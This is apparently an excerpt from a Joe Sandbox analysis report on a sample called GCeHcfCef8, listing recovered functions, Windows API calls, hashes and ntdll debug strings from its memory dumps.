
API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A662 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D

Memory Dump Source

Source File: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_GCeHcfCef8.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 89cd7130b492affeb9e62c44942b74c6ea8dcb436f98f58145ce05a9f648cd43
Instruction ID: e880f57384980f89cf93d6b95c6378fdede24d9d2de261eb18b1810246b2b0e1
Opcode Fuzzy Hash: 89cd7130b492affeb9e62c44942b74c6ea8dcb436f98f58145ce05a9f648cd43
Instruction Fuzzy Hash: A5E022B41003415BEB10FF65D4C04D737A8BF84314F10852EE84D87206C231E066CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0041A670 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D

Memory Dump Source

Source File: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_GCeHcfCef8.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A7D0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800

Memory Dump Source

Source File: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_GCeHcfCef8.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A6B0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8

Memory Dump Source

Source File: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_GCeHcfCef8.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1

Uniqueness

Uniqueness Score: -1.00%

Function 01722C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01722C24

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f10b5c70435c53c7445572044e21212d3b4d89c773d38fb110db281334327424
Instruction ID: af9a242a02012c700c32786a984de63edc529fadca1fb764e37b69eca963f61f
Opcode Fuzzy Hash: f10b5c70435c53c7445572044e21212d3b4d89c773d38fb110db281334327424
Instruction Fuzzy Hash: 32B09B719055D5C5DB11E7644608717B91077D0701F15C171E2434751F4738C1D2F276

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01798D10 Relevance: 37.8, Strings: 30, Instructions: 268COMMONLIBRARYCODE

Download Yara Rule

Strings

write to, xrefs: 01798F56
a NULL pointer, xrefs: 01798F90
The critical section is owned by thread %p., xrefs: 01798E69
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01798E3F
*** enter .cxr %p for the context, xrefs: 01798FBD
an invalid address, %p, xrefs: 01798F7F
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01798F34
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01798E86
The instruction at %p referenced memory at %p., xrefs: 01798EE2
*** enter .exr %p for the exception record, xrefs: 01798FA1
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01798F2D
*** then kb to get the faulting stack, xrefs: 01798FCC
The resource is owned exclusively by thread %p, xrefs: 01798E24
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01798DC4
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01798FEF
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01798D8C
The instruction at %p tried to %s , xrefs: 01798F66
*** An Access Violation occurred in %ws:%s, xrefs: 01798F3F
Go determine why that thread has not released the critical section., xrefs: 01798E75
<unknown>, xrefs: 01798D2E, 01798D81, 01798E00, 01798E49, 01798EC7, 01798F3E
*** A stack buffer overrun occurred in %ws:%s, xrefs: 01798DA3
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01798F26
This failed because of error %Ix., xrefs: 01798EF6
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01798DD3
The resource is owned shared by %d threads, xrefs: 01798E2E
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01798DB5
*** Resource timeout (%p) in %ws:%s, xrefs: 01798E02
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 01798E4B
*** Inpage error in %ws:%s, xrefs: 01798EC8
read from, xrefs: 01798F5D, 01798F62

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 6d5180ef70b1509080ba1fd33550cfba1a4cb4015926214b4f80ec8e35b4b89c
Instruction ID: b853459ea08e379dca4a4f57b406e87c1e3bf71b8152e40fda4ff4cbc885e84a
Opcode Fuzzy Hash: 6d5180ef70b1509080ba1fd33550cfba1a4cb4015926214b4f80ec8e35b4b89c
Instruction Fuzzy Hash: 1B81F7B5A44208BFDF219B1AEC59D7BBB36EF5BB10F050098F6056F212E3718815CA63

Uniqueness

Uniqueness Score: -1.00%

Function 01762349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

FrontEndHeapDebugOptions, xrefs: 01762489
GlobalFlag2, xrefs: 01762FC0
DisableExceptionChainValidation, xrefs: 0176275F
MaxDeadActivationContexts, xrefs: 01762D82
@, xrefs: 01762B74
ShutdownFlags, xrefs: 017624A1
MaxLoaderThreads, xrefs: 017624EC
CFGOptions, xrefs: 01762967
minkernel\ntdll\ldrinit.c, xrefs: 01763187
LdrpInitializeExecutionOptions, xrefs: 0176317D
DisableHeapLookaside, xrefs: 0176246D
Initializing the application verifier package failed with status 0x%08lx, xrefs: 01763176
TracingFlags, xrefs: 01762549
ExecuteOptions, xrefs: 017625A0
MinimumStackCommitInBytes, xrefs: 01762BB0
UnloadEventTraceDepth, xrefs: 017624C0
UseImpersonatedDeviceMap, xrefs: 0176251C
@, xrefs: 01762942
GlobalFlag, xrefs: 01762F3F, 01763059
RaiseExceptionOnPossibleDeadlock, xrefs: 01762579

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: a24c4fc5e0b5a9bdb18ba17a9b57ecd3aea29cf422be4990c459aff49a7b1031
Instruction ID: 44670ab95c772d724ed69132892341e34c6ff92ea4ae58092104863d9b4ddfa8
Opcode Fuzzy Hash: a24c4fc5e0b5a9bdb18ba17a9b57ecd3aea29cf422be4990c459aff49a7b1031
Instruction Fuzzy Hash: F0927C71608342ABE761DF28C884B6BFBE9BB84750F04492DFE95D7252D770E844CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01718620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

corrupted critical section, xrefs: 017554C2
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0175540A, 01755496, 01755519
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017554CE
Thread is in a state in which it cannot own a critical section, xrefs: 01755543
double initialized or corrupted critical section, xrefs: 01755508
8, xrefs: 017552E3
Invalid debug info address of this critical section, xrefs: 017554B6
Critical section address., xrefs: 01755502
Address of the debug info found in the active list., xrefs: 017554AE, 017554FA
Critical section debug info address, xrefs: 0175541F, 0175552E
Thread identifier, xrefs: 0175553A
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017554E2
undeleted critical section in freed memory, xrefs: 0175542B
Critical section address, xrefs: 01755425, 017554BC, 01755534

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: 02546ed61a53693736448649a6deb37a537d73bead18006639aa54a2054674d6
Instruction ID: 3251e849f2f48ec36ad58582a46698c17daa54db107f20986547c4001b035a93
Opcode Fuzzy Hash: 02546ed61a53693736448649a6deb37a537d73bead18006639aa54a2054674d6
Instruction Fuzzy Hash: E48189B1A01358EBDB60CF99CC45BAEFBB9EB08B14F20415DF909B7241D3B5A941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 017129F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01752624
SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017524C0
RtlpResolveAssemblyStorageMapEntry, xrefs: 0175261F
SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01752602
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01752498
@, xrefs: 0175259B
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017522E4
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01752409
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01752412
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017525EB
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01752506

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: 1880a7cdbbcbad25e739320d6292897842b379b1edbf93dae91e35f1291ba067
Instruction ID: 27af2138516a88654fdef496941b2f0f3b34dee8f2697af2b77eb00f28f83e3b
Opcode Fuzzy Hash: 1880a7cdbbcbad25e739320d6292897842b379b1edbf93dae91e35f1291ba067
Instruction Fuzzy Hash: 7B0270B1D002299FDB61DF58CC84BA9F7B8AB54704F1041DAEB09A7246EB709F84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 01788B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

SegmentHeap, xrefs: 01788BE9
services.exe, xrefs: 01788B96
heapType, xrefs: 01788BCB
http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 01788BD0
csrss.exe, xrefs: 01788B80
runtimebroker.exe, xrefs: 01788B73
lsass.exe, xrefs: 01788BA1
svchost.exe, xrefs: 01788B68
smss.exe, xrefs: 01788B8B
DefaultBrowser_NOPUBLISHERID, xrefs: 01788D00

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: 0273d1c1b45ce08d1bd17f9965b4a5b0ff65b47f0ce480545f241cb7e9137ce1
Instruction ID: bb1175ec0940717df8a57916550171a6d1666e6b16c5a8181fd720a593bcb373
Opcode Fuzzy Hash: 0273d1c1b45ce08d1bd17f9965b4a5b0ff65b47f0ce480545f241cb7e9137ce1
Instruction Fuzzy Hash: 6C51CF715453119BC329EF288884BABFBECFF98350F54492DE959C3284E770D584C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 016FAD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrapi.c, xrefs: 01748086, 017483BC
DLL search path passed in externally: %ws, xrefs: 017480A6
minkernel\ntdll\ldrfind.c, xrefs: 017482E1
LdrpFindLoadedDllInternal, xrefs: 017482D7
LdrpInitializeDllPath, xrefs: 017480AD
minkernel\ntdll\ldrutil.c, xrefs: 017480B7
LdrGetDllHandleEx, xrefs: 0174807C, 017483B2
Status: 0x%08lx, xrefs: 017482D0, 017483AB
DLL name: %wZ, xrefs: 01748075

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
API String ID: 0-3197712848
Opcode ID: 15a659b3d6789938532a970790be3d70c63c353ed467708c86c740583a6e2649
Instruction ID: 7c6369ee756484ed5ae173b423d762ff107b00fc7e217bc316a70ff9efb3f2c1
Opcode Fuzzy Hash: 15a659b3d6789938532a970790be3d70c63c353ed467708c86c740583a6e2649
Instruction Fuzzy Hash: 0512EF71A093468BD325DF68C880BAAB7E5FF84714F08491DFA898B391E734D945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01790274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 01790399, 017904A8, 017905D0, 01790675, 017906CC
RtlReAllocateHeap, xrefs: 017902BF, 01790362
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 017906EA
Just reallocated block at %p to %Ix bytes, xrefs: 017905F1
HEAP: , xrefs: 017903A6, 017904B5, 017905DD, 01790682, 017906D9
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 0179069F
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 017904D3
About to reallocate block at %p to %Ix bytes, xrefs: 017903BA

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: 4ead3c7a93d00c8160fc9d3fc0d384b8daee510211a47030964322952e15a555
Instruction ID: b500591ad5bbcdb97e288b5aa5755fbe9097531143a4d719d06fa2e633720f6b
Opcode Fuzzy Hash: 4ead3c7a93d00c8160fc9d3fc0d384b8daee510211a47030964322952e15a555
Instruction Fuzzy Hash: 2CD1EE31920286DFDF22DF68E841AA9FBF5FF4A720F19804DF5469B612C7349988CB54

Uniqueness

Uniqueness Score: -1.00%

Function 017689B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01768A3D
VerifierFlags, xrefs: 01768C50
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01768A67
HandleTraces, xrefs: 01768C8F
AVRF: -*- final list of providers -*- , xrefs: 01768B8F
VerifierDlls, xrefs: 01768CBD
VerifierDebug, xrefs: 01768CA5

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: 994dd8199f443961c0a0ccbccbad73687a596de7d6f5fa4ae70ef134a423a57a
Instruction ID: 98d5994b88bf25eade47f02f254f768400161977dad30c91df758ce1bd1c6f34
Opcode Fuzzy Hash: 994dd8199f443961c0a0ccbccbad73687a596de7d6f5fa4ae70ef134a423a57a
Instruction Fuzzy Hash: 8F9125B2646316AFD721DF68C890B1AFBBCEBA4724F04445CFE456B244C730AD44CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 016EEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON

Download Yara Rule

Strings

T, xrefs: 016EEB4E
LdrpResSearchResourceInsideDirectory Enter, xrefs: 016EEB58
, xrefs: 016EF299
R, xrefs: 016EEB62
LdrpResSearchResourceInsideDirectory Exit, xrefs: 016EEB6C
{, xrefs: 01744643

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
API String ID: 0-1109411897
Opcode ID: 5544607f6983764b47863f48fab81993d7d1a79f27e10cce88bea6b56d686869
Instruction ID: 7b15f4a0fec87429dc5b7ff1fa6f10e3f4f89d5aa3ac55ec2cf4557b95df6213
Opcode Fuzzy Hash: 5544607f6983764b47863f48fab81993d7d1a79f27e10cce88bea6b56d686869
Instruction Fuzzy Hash: F1A23674A0662A8FDF64DF18CC987A9BBB5AF45304F1442E9D90EA7390DB319E85DF00

Uniqueness

Uniqueness Score: -1.00%

Function 017163FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

_LdrpInitialize, xrefs: 017540DF, 01754141, 01754205, 0175425F
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 017541FE
Process initialization failed with status 0x%08lx, xrefs: 0175413A
Delaying execution failed with status 0x%08lx, xrefs: 01754258
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 017540D8
minkernel\ntdll\ldrinit.c, xrefs: 017540E9, 0175414B, 0175420F, 01754269

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: c7ae23e2efa630a249b3c509f3a1345e6b5948b100069e4b5394212a5d183a87
Instruction ID: 1f16c2d3a76cce0c7e6378f4a570b877d1102af2415ec40007a97ed470acdc11
Opcode Fuzzy Hash: c7ae23e2efa630a249b3c509f3a1345e6b5948b100069e4b5394212a5d183a87
Instruction Fuzzy Hash: DE913971A413299BDB35DF58D888BA9FBB1AB50B34F10412CFD0667289E7F09981C791

Uniqueness

Uniqueness Score: -1.00%

Function 016D645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01739A2A
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017399ED
LdrpInitShimEngine, xrefs: 017399F4, 01739A07, 01739A30
apphelp.dll, xrefs: 016D6496
minkernel\ntdll\ldrinit.c, xrefs: 01739A11, 01739A3A
Getting the shim engine exports failed with status 0x%08lx, xrefs: 01739A01

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: 7b14ed8656d3b65625038c238dd3748e08d79480360c65d67c1a068676d261a3
Instruction ID: 3ba55bb351f67dc85b269652f15ad2bba89a8e929aeac818b7a2d158d94d22cb
Opcode Fuzzy Hash: 7b14ed8656d3b65625038c238dd3748e08d79480360c65d67c1a068676d261a3
Instruction Fuzzy Hash: 955105716083059FD720DF24CC91BABB7E5FB84B58F00491DFA8697151DB70EA45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01712674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

RtlGetAssemblyStorageRoot, xrefs: 01752160, 0175219A, 017521BA
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0175219F
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01752178
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01752180
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017521BF
SXS: %s() passed the empty activation context, xrefs: 01752165

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: 770e013b68c88fa6710e15a0a776986f76dd9ae68e24b5613e9179453fb201c4
Instruction ID: eec28f89d014e043eea4504f94911046f0a8d6f35effc38d5b582a987a1e9287
Opcode Fuzzy Hash: 770e013b68c88fa6710e15a0a776986f76dd9ae68e24b5613e9179453fb201c4
Instruction Fuzzy Hash: 2A310536B40215BBE7219A9E9C45F6BFB68DB64E50F15006DFF05BB146D2B09E00CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0171C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

Unable to build import redirection Table, Status = 0x%x, xrefs: 017581E5
LdrpInitializeProcess, xrefs: 0171C6C4
LdrpInitializeImportRedirection, xrefs: 01758177, 017581EB
Loading import redirection DLL: '%wZ', xrefs: 01758170
minkernel\ntdll\ldrredirect.c, xrefs: 01758181, 017581F5
minkernel\ntdll\ldrinit.c, xrefs: 0171C6C3

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

